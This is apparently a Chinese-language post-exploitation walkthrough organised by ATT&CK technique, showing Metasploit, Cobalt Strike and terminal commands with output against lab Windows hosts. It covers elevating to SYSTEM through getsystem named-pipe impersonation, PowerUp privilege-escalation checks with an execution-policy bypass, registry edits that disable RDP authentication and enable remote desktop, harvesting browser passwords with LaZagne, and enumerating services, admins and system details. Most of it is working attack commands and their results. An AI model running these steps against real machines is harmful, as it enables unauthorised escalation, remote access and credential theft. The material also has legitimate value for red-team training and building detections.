sihost.exe 4988 暂缺
svchost.exe 5012 WpnUserService_56a0b
taskhostw.exe 5088 暂缺
svchost.exe 5116 TokenBroker
svchost.exe 4452 TabletInputService
svchost.exe 64 CDPSvc
ctfmon.exe 4732 暂缺
svchost.exe 1904 PcaSvc
explorer.exe 5188 暂缺
svchost.exe 5616 cbdhsvc_56a0b
sv_websvr.exe 5712 暂缺
ShellExperienceHost.exe 5844 暂缺
RuntimeBroker.exe 6016 暂缺
WindowsInternal.Composabl 5184 暂缺
vmtoolsd.exe 4816 暂缺
jusched.exe 328 暂缺
AttackView.exe 5992 暂缺
svchost.exe 2268 SSDPSRV
powershell.exe 1272 暂缺
conhost.exe 3816 暂缺
svchost.exe 4400 LicenseManager
svchost.exe 4548 DsSvc
svchost.exe 2228 StorSvc
WmiPrvSE.exe 3944 暂缺
postgres.exe 1364 暂缺
postgres.exe 4520 暂缺
postgres.exe 4488 暂缺
postgres.exe 3392 暂缺
svchost.exe 2212 BITS
svchost.exe 4656 WinHttpAutoProxySvc
WmiPrvSE.exe 6588 暂缺
tasklist.exe 6920 暂缺
PS C:\Users\Administrator\Desktop\powrshell> net start
已经启动以下 Windows 服务:
Acunetix
Acunetix Database
Background Tasks Infrastructure Service
Base Filtering Engine
Certificate Propagation
CNG Key Isolation
COM+ Event System
COM+ System Application
CoreMessaging
Cryptographic Services
Data Sharing Service
DCOM Server Process Launcher
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
FlexNet Licensing Service
IKE and AuthIP IPsec Keying Modules
IP Helper
IPsec Policy Agent
Local Session Manager
LPD Service
Network Connection Broker
Network List Service
Network Location Awareness
Network Store Interface Service
Power
Print Spooler
Program Compatibility Assistant Service
Remote Access Connection Manager
Remote Desktop Configuration
Remote Desktop Services
Remote Desktop Services UserMode Port Redirector
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Secure Socket Tunneling Protocol Service
Security Accounts Manager
Server
Shell Hardware Detection
SSDP Discovery
SSL VPN Management Service Program For NG
State Repository Service
Storage Service
SysMain
System Event Notification Service
System Events Broker
Task Scheduler
TCP/IP NetBIOS Helper
Themes
Time Broker
Touch Keyboard and Handwriting Panel Service
User Manager
User Profile Service
VMware Tools
Web 帐户管理器
Windows Audio
Windows Audio Endpoint Builder
Windows Connection Manager
Windows Defender Firewall
Windows Event Log
Windows Font Cache Service
Windows Management Instrumentation
Windows Push Notifications User Service_56a0b
Windows 推送通知系统服务
Windows 许可证管理器服务
WinHTTP Web Proxy Auto-Discovery Service
WLAN AutoConfig
Workstation
剪贴板用户服务_56a0b
数据使用量
连接设备平台服务
连接设备平台用户服务_56a0b
命令成功完成。
PS C:\Users\Administrator\Desktop\powrshell> qprocess *
用户名 会话名 ID PID 映像
(未知) services 0 0
(未知) services 0 4 system
system services 0 88 registry
system services 0 296 smss.exe
system services 0 396 csrss.exe
system services 0 496 wininit.exe
>system console 1 508 csrss.exe
>system console 1 588 winlogon.exe
system services 0 604 services.exe
system services 0 632 lsass.exe
system services 0 732 svchost.exe
umfd-0 services 0 744 fontdrvhost.ex
>umfd-1 console 1 812 fontdrvhost.ex
network service services 0 860 svchost.exe
system services 0 904 svchost.exe
>dwm-1 console 1 1000 dwm.exe
network service services 0 376 svchost.exe
local service services 0 656 svchost.exe
local service services 0 808 svchost.exe
system services 0 1120 svchost.exe
system services 0 1136 svchost.exe
system services 0 1176 svchost.exe
local service services 0 1248 svchost.exe
system services 0 1300 svchost.exe
local service services 0 1332 svchost.exe
system services 0 1348 svchost.exe
local service services 0 1420 svchost.exe
local service services 0 1444 svchost.exe
system services 0 1512 svchost.exe
local service services 0 1548 svchost.exe
system services 0 1580 svchost.exe
system services 0 1616 svchost.exe
system services 0 1716 memory compr..
local service services 0 1736 wudfhost.exe
network service services 0 1792 svchost.exe
system services 0 1812 svchost.exe
network service services 0 1844 svchost.exe
system services 0 1892 svchost.exe
local service services 0 1916 svchost.exe
system services 0 2028 svchost.exe
local service services 0 2036 svchost.exe
local service services 0 2064 svchost.exe
network service services 0 2204 svchost.exe
local service services 0 2220 svchost.exe
local service services 0 2240 svchost.exe
system services 0 2276 svchost.exe
system services 0 2504 svchost.exe
system services 0 2544 svchost.exe
system services 0 2612 spoolsv.exe
local service services 0 2648 svchost.exe
system services 0 2772 svchost.exe
network service services 0 2784 svchost.exe
system services 0 2844 wvs_supervis..
local service services 0 2852 pg_ctl.exe
network service services 0 2860 svchost.exe
local service services 0 2884 svchost.exe
system services 0 2900 fnplicensing..
system services 0 2928 svchost.exe
system services 0 2988 svchost.exe
system services 0 3016 svchost.exe
local service services 0 1656 svchost.exe
system services 0 2364 vmtoolsd.exe
system services 0 2312 svchost.exe
system services 0 236 sv_service.exe
system services 0 2740 svchost.exe
local service services 0 3236 svchost.exe
system services 0 3260 svchost.exe
system services 0 3416 opsrv.exe
system services 0 3448 svchost.exe
local service services 0 3456 postgres.exe
system services 0 3464 conhost.exe
local service services 0 3516 conhost.exe
system services 0 3976 dllhost.exe
local service services 0 644 postgres.exe
local service services 0 2892 postgres.exe
local service services 0 660 postgres.exe
local service services 0 2920 postgres.exe
local service services 0 2880 postgres.exe
network service services 0 4256 msdtc.exe
>administrator console 1 4972 svchost.exe
>administrator console 1 4988 sihost.exe
>administrator console 1 5012 svchost.exe
>administrator console 1 5088 taskhostw.exe
system services 0 5116 svchost.exe
system services 0 4452 svchost.exe
local service services 0 64 svchost.exe
>administrator console 1 4732 ctfmon.exe
system services 0 1904 svchost.exe
>administrator console 1 5188 explorer.exe
>administrator console 1 5616 svchost.exe
>administrator console 1 5712 sv_websvr.exe
>administrator console 1 5844 shellexperie..
>administrator console 1 6016 runtimebroke..
>administrator console 1 5184 windowsinter..
>administrator console 1 4816 vmtoolsd.exe
>administrator console 1 5992 attackview.exe
local service services 0 2268 svchost.exe
>administrator console 1 1272 powershell.exe
>administrator console 1 3816 conhost.exe
local service services 0 4400 svchost.exe
system services 0 4548 svchost.exe
system services 0 2228 svchost.exe
system services 0 3944 wmiprvse.exe
local service services 0 1364 postgres.exe
local service services 0 4520 postgres.exe
local service services 0 4488 postgres.exe
local service services 0 3392 postgres.exe
local service services 0 4656 svchost.exe
network service services 0 6588 wmiprvse.exe
local service services 0 2528 audiodg.exe
>administrator console 1 260 qprocess.exe

msf下操作:

ps

post/windows/gather/enum_services

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
264 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
312 264 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
340 264 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
388 340 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
400 340 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
572 1436 payload1.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Documents and Settings\Administrator\����\payload1.exe
592 388 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
608 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
688 388 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
748 388 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
800 388 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
816 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
912 3424 TPAutoConnect.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
956 388 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
984 388 msdtc.exe x86 0 C:\WINDOWS\system32\msdtc.exe
1100 388 httpd.exe x86 0 NT AUTHORITY\SYSTEM C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
1144 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1200 388 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1228 388 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
1252 388 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
1320 168 conime.exe x86 0 ROOT-5DE52AC98B\Administrator C:\WINDOWS\system32\conime.exe
1328 388 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1348 3424 TPAutoConnect.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
1352 388 SafeDogUpdateCenter.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SafeDog\SafeDogUpdateCenter\SafeDogUpdateCenter.exe
1436 1168 explorer.exe x86 0 ROOT-5DE52AC98B\Administrator C:\WINDOWS\Explorer.EXE
1440 388 CloudHelper.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SafeDog\SafeDogUpdateCenter\CloudHelper.exe
1468 1436 ctfmon.exe x86 0 ROOT-5DE52AC98B\Administrator C:\WINDOWS\system32\ctfmon.exe
1804 388 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1856 388 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1932 388 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
2072 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2248 1100 httpd.exe x86 0 NT AUTHORITY\SYSTEM C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
2264 1436 vmtoolsd.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2904 608 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse.exe
3196 608 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
3368 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
3408 1436 artifact.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Documents and Settings\Administrator\����\artifact.exe
3424 388 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
3520 388 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3600 1436 artifact.exe x86 0 ROOT-5DE52AC98B\Administrator C:\Documents and Settings\Administrator\����\artifact.exe
3876 340 logon.scr x86 0 ROOT-5DE52AC98B\Administrator C:\WINDOWS\System32\logon.scr
msf5 post(windows/gather/enum_logged_on_users) > use post/windows/gather/enum_services
msf5 post(windows/gather/enum_services) > set session 1
session => 1
msf5 post(windows/gather/enum_services) > exploit
[*] Listing Service Info for matching services, please wait...
[+] New service credential detected: AeLookupSvc is running as 'LocalSystem'
[+] New service credential detected: Alerter is running as 'NT AUTHORITY\LocalService'
[+] New service credential detected: aspnet_state is running as 'NT AUTHORITY\NetworkService'
Services
========
Name Credentials Command Startup
---- ----------- ------- -------
ALG NT AUTHORITY\LocalService Manual C:\WINDOWS\System32\alg.exe
AeLookupSvc LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
Alerter NT AUTHORITY\LocalService Disabled C:\WINDOWS\system32\svchost.exe -k LocalService
Apache2 LocalSystem Auto "C:\phpstudy0\Apache\bin\httpd.exe" -k runservice
AppMgmt LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
AudioSrv LocalSystem Disabled C:\WINDOWS\System32\svchost.exe -k netsvcs
BITS LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
Browser LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
COMSysApp LocalSystem Manual C:\WINDOWS\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
CiSvc LocalSystem Disabled C:\WINDOWS\system32\cisvc.exe
ClipSrv LocalSystem Disabled C:\WINDOWS\system32\clipsrv.exe
CryptSvc LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
DcomLaunch LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k DcomLaunch
Dfs LocalSystem Manual C:\WINDOWS\system32\Dfssvc.exe
Dhcp NT AUTHORITY\NetworkService Auto C:\WINDOWS\system32\svchost.exe -k NetworkService
Dnscache NT AUTHORITY\NetworkService Auto C:\WINDOWS\system32\svchost.exe -k NetworkService
ERSvc LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k WinErr
EventSystem LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
Eventlog LocalSystem Auto C:\WINDOWS\system32\services.exe
HTTPFilter LocalSystem Manual C:\WINDOWS\system32\lsass.exe
HidServ LocalSystem Disabled C:\WINDOWS\System32\svchost.exe -k netsvcs
IISADMIN LocalSystem Auto C:\WINDOWS\system32\inetsrv\inetinfo.exe
ImapiService LocalSystem Disabled C:\WINDOWS\system32\imapi.exe
IsmServ LocalSystem Disabled C:\WINDOWS\System32\ismserv.exe
LicenseService NT AUTHORITY\NetworkService Disabled C:\WINDOWS\System32\llssrv.exe
LmHosts NT AUTHORITY\LocalService Auto C:\WINDOWS\system32\svchost.exe -k LocalService
MSDTC NT AUTHORITY\NetworkService Auto C:\WINDOWS\system32\msdtc.exe
MSIServer LocalSystem Manual C:\WINDOWS\system32\msiexec.exe /V
MSMQ LocalSystem Auto C:\WINDOWS\system32\mqsvc.exe
Messenger LocalSystem Disabled C:\WINDOWS\system32\svchost.exe -k netsvcs
MySQL LocalSystem Auto C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe MySQL
MySQLa LocalSystem Auto C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe MySQLa
NetDDE LocalSystem Disabled C:\WINDOWS\system32\netdde.exe
NetDDEdsdm LocalSystem Disabled C:\WINDOWS\system32\netdde.exe
Netlogon LocalSystem Manual C:\WINDOWS\system32\lsass.exe
Netman LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k netsvcs
Nla LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
NtFrs LocalSystem Manual C:\WINDOWS\system32\ntfrs.exe
NtLmSsp LocalSystem Manual C:\WINDOWS\system32\lsass.exe
NtmsSvc LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
PlugPlay LocalSystem Auto C:\WINDOWS\system32\services.exe
PolicyAgent LocalSystem Auto C:\WINDOWS\system32\lsass.exe
ProtectedStorage LocalSystem Auto C:\WINDOWS\system32\lsass.exe
RDSessMgr LocalSystem Manual C:\WINDOWS\system32\sessmgr.exe
RSoPProv LocalSystem Manual C:\WINDOWS\system32\RSoPProv.exe
RasAuto LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
RasMan LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
RemoteAccess LocalSystem Disabled C:\WINDOWS\system32\svchost.exe -k netsvcs
RemoteRegistry NT AUTHORITY\LocalService Auto C:\WINDOWS\system32\svchost.exe -k regsvc
RpcLocator NT AUTHORITY\NetworkService Manual C:\WINDOWS\system32\locator.exe
RpcSs NT AUTHORITY\NetworkService Auto C:\WINDOWS\system32\svchost.exe -k rpcss
SCardSvr NT AUTHORITY\LocalService Manual C:\WINDOWS\System32\SCardSvr.exe
SENS LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
SafeDogCloudHelper LocalSystem Auto "C:\Program Files\SafeDog\SafeDogUpdateCenter\CloudHelper.exe"
Safedog Update Center LocalSystem Auto "C:\Program Files\SafeDog\SafeDogUpdateCenter\SafeDogUpdateCenter.exe"
SamSs LocalSystem Auto C:\WINDOWS\system32\lsass.exe
Schedule LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
SharedAccess LocalSystem Disabled C:\WINDOWS\system32\svchost.exe -k netsvcs
ShellHWDetection LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
Spooler LocalSystem Auto C:\WINDOWS\system32\spoolsv.exe
SysmonLog NT Authority\NetworkService Auto C:\WINDOWS\system32\smlogsvc.exe
TPAutoConnSvc LocalSystem Manual "C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"
TPVCGateway LocalSystem Manual "C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"
TapiSrv LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k tapisrv
TermService LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k termsvcs
Themes LocalSystem Disabled C:\WINDOWS\System32\svchost.exe -k netsvcs
TlntSvr NT AUTHORITY\LocalService Disabled C:\WINDOWS\system32\tlntsvr.exe
TrkSvr LocalSystem Disabled C:\WINDOWS\system32\svchost.exe -k netsvcs
TrkWks LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
Tssdis LocalSystem Disabled C:\WINDOWS\System32\tssdis.exe
UMWdf NT AUTHORITY\LocalService Manual C:\WINDOWS\system32\wdfmgr.exe
UPS NT AUTHORITY\LocalService Manual C:\WINDOWS\System32\ups.exe
VGAuthService LocalSystem Auto "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
VMTools LocalSystem Auto "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
VMware Physical Disk Helper Service LocalSystem Auto "C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
VSS LocalSystem Manual C:\WINDOWS\System32\vssvc.exe
W32Time NT AUTHORITY\LocalService Auto C:\WINDOWS\System32\svchost.exe -k LocalService
W3SVC LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k iissvcs
WZCSVC LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
WebClient NT AUTHORITY\LocalService Disabled C:\WINDOWS\system32\svchost.exe -k LocalService
WinHttpAutoProxySvc NT AUTHORITY\LocalService Manual C:\WINDOWS\system32\svchost.exe -k LocalService
WmdmPmSN LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k netsvcs
Wmi LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k netsvcs
WmiApSrv LocalSystem Manual C:\WINDOWS\system32\wbem\wmiapsrv.exe
apache LocalSystem Auto "C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe" -k runservice
aspnet_state NT AUTHORITY\NetworkService Manual C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe
dmadmin LocalSystem Manual C:\WINDOWS\System32\dmadmin.exe /com
dmserver LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
helpsvc LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
kdc LocalSystem Disabled C:\WINDOWS\System32\lsass.exe
lanmanserver LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
lanmanworkstation LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
mnmsrvc LocalSystem Disabled C:\WINDOWS\system32\mnmsrvc.exe
sacsvr LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k netsvcs
seclogon LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
stisvc NT AUTHORITY\LocalService Disabled C:\WINDOWS\system32\svchost.exe -k imgsvc
swprv LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k swprv
vds LocalSystem Manual C:\WINDOWS\System32\vds.exe
vmvss LocalSystem Manual C:\WINDOWS\system32\dllhost.exe /Processid:{64F3ADCF-113F-4FD8-B7EE-76884E9E75E6}
winmgmt LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
wuauserv LocalSystem Auto C:\WINDOWS\system32\svchost.exe -k netsvcs
xmlprov LocalSystem Manual C:\WINDOWS\System32\svchost.exe -k netsvcs
[+] Loot file stored in: /root/.msf4/loot/20190907144835_default_192.168.2.114_windows.services_639665.txt
[*] Post module execution completed

cs下操作:

explore -- > process list

截图_2019-09-07_14-53-28.png

(注册权限不足)Service Registry Permissions Weakness

Check for common privilege escalation methods

termianal下操作:

powershell.exe -epbypass PowerUp.ps1

Invoke-AllChecks

msf下操作:

exploit/windows/local/trusted_service_path

cs下操作:

powershell-import /path/to/PowerUp.ps1

powershell Invoke-AllChecks

(利用漏洞提权)Exploitation for Privilege Escalation

Elevate to SYSTEM level process(提权至system)

msf下操作:

getsystem

getsystem工作原理:

  • ①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。

  • ②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。

  • ③Windows服务已启动,导致与命名管道建立连接。

  • ④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。

然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程

有三种工作方式

0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)1:命名管道模拟(在内存/管理中)
2 : Named Pipe Impersonation (Dropper/Admin)2:命名管道模拟(Dropper/Admin)
3 : Token Duplication (In Memory/Admin)3:令牌复制(在内存/管理中)
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

cs下操作:

getsystem

beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 100 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

(权限组发现)Permission Groups Discovery

Enumerate local Admin accounts(本地账户枚举)

terminal下操作:

net localgroup "Administrators"

PS C:\Users\Administrator\Desktop\powrshell> net localgroup "Administrators"
别名 Administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
命令成功完成。

msf下操作:

post/windows/gather/local_admin_search_enum

msf5 post(windows/gather/local_admin_search_enum) > exploit
[-] Running as SYSTEM, module should be run with USER level rights
[*] Scanned 1 of 1 hosts (100% complete)
[*] Post module execution completed

cs下操作:

shell net localgroup "Administrators"

beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C net localgroup "Administrators" (token): 1349

Get domain admin accounts(域管理账户枚举)

terminal下操作:

net group ["Domain Admins"] /domain[:DOMAIN]

PS C:\Users\Administrator\Desktop\powrshell> net group /domain
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系。

msf下操作:

post/windows/gather/enum_domain_group_users

msf5 post(windows/gather/enum_domain_group_users) > exploit
[*] Running module against ROOT-5DE52AC98B
[-] Post failed: NoMethodError undefined method `each' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_domain_group_users.rb:77:in `get_members'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_domain_group_users.rb:42:in `run'
[*] Post module execution completed

cs下操作:

net group ["Domain Admins"] /domain

(远程桌面协议)Remote Desktop Protocol

Enable RDP Services(开启RDP服务)

terminal下操作:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net start TermService
PS C:\Users\Administrator\Desktop\powrshell> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\
RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
操作成功完成。
PS C:\Users\Administrator\Desktop\powrshell> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Serve
r" /v fDenyTSConnections /t REG_DWORD /d 0 /f
操作成功完成。
PS C:\Users\Administrator\Desktop\powrshell> net start TermService
请求的服务已经启动。
请键入 NET HELPMSG 2182 以获得更多的帮助。

msf下操作:

post/windows/manage/enable_rdp

msf5 post(windows/manage/enable_rdp) > exploit
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20190907201411_default_192.168.2.114_host.windows.cle_731683.txt
[*] Post module execution completed

cs下操作:

shell REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
shell net start TermService
explore --> desktop

(在文件中获取凭证)Credentials in Files

Collect passwords from web browsers(在浏览器中获取密码)

https://github.com/AlessandroZ/LaZagne

https://github.com/hassaanaliw/chromepass

terminal下操作:

laZagne.exe browsers [-f]

PS C:\Users\Administrator\Desktop\powrshell> C:\Users\Administrator\Desktop\lazagne.exe browsers -f
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
[+] System masterkey decrypted for a02f012c-b6ff-48b9-8b07-5a2ea73628d6
[+] System masterkey decrypted for 56e7df96-74cb-45af-95ed-f15706dcff3e
[+] 0 passwords have been found.
For more information launch it again with the -v option
elapsed time = 0.952999830246

(系统信息发现)System Information Discovery

Get Windows version(windows版本获取)

terminal下操作:

ver

C:\Users\Administrator\Desktop\powrshell>ver
Microsoft Windows [版本 10.0.17763.593]

cs下操作:

shell ver

terminal下操作:

set

C:\Users\Administrator\Desktop\powrshell>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Administrator\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-QQF0MLN
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\Administrator
LOCALAPPDATA=C:\Users\Administrator\AppData\Local
LOGONSERVER=\\DESKTOP-QQF0MLN
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Program Files (x86)\NetSarang\Xftp 6\;C:\Program Files (x86)\NetSarang\Xshell 6\;C:\Program Files
iles\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\Win
v1.0\;C:\python3;C:\python3\Scripts;C:\Python27;C:\Python27\Scripts;C:\python3\Scripts\;C:\python3\;C:\Us
or\AppData\Local\Microsoft\WindowsApps;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 10, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=9e0a
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Users\Administrator\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShel
ndows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\ADMINI~1\AppData\Local\Temp
TMP=C:\Users\ADMINI~1\AppData\Local\Temp
USERDOMAIN=DESKTOP-QQF0MLN
USERDOMAIN_ROAMINGPROFILE=DESKTOP-QQF0MLN
USERNAME=Administrator
USERPROFILE=C:\Users\Administrator
windir=C:\Windows

cs下操作:

shell set

Get computer information(computer信息获取)

terminal下操作:

net config workstation

net config server

C:\Users\Administrator\Desktop\powrshell>net config workstation
计算机名 \\DESKTOP-QQF0MLN
计算机全名 DESKTOP-QQF0MLN
用户名 Administrator
工作站正运行于
NetBT_Tcpip_{D56C33AF-9F2F-4E8B-90F2-A5FB6CAA3D90} (000C29D73FB2)
软件版本 Windows 10 Enterprise LTSC 2019
工作站域 WORKGROUP
登录域 DESKTOP-QQF0MLN
COM 打开超时 (秒) 0
COM 发送计数 (字节) 16
COM 发送超时 (毫秒) 250
命令成功完成。
C:\Users\Administrator\Desktop\powrshell>net config server
服务器名称 \\DESKTOP-QQF0MLN
服务器注释
软件版本 Windows 10 Enterprise LTSC 2019
服务器正运行于
NetbiosSmb (DESKTOP-QQF0MLN)
NetBT_Tcpip_{D56C33AF-9F2F-4E8B-90F2-A5FB6CAA3D90} (DESKTOP-QQF0MLN)
服务器已隐藏 No
登录的用户数量上限 20
每个会话打开的文件数量上限 16384
空闲的会话时间 (分) 15
命令成功完成。

cs下操作:

shell net config workstation

shell net config server

Get configuration information(配置信息获取)

terminal下操作:

systeminfo [/s COMPNAME] [/u DOMAIN\user] [/p password]

截图_2019-09-07_20-39-48.png

msf下操作:

sysinfo

run winenum

meterpreter > sysinfo
Computer : ROOT-5DE52AC98B
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
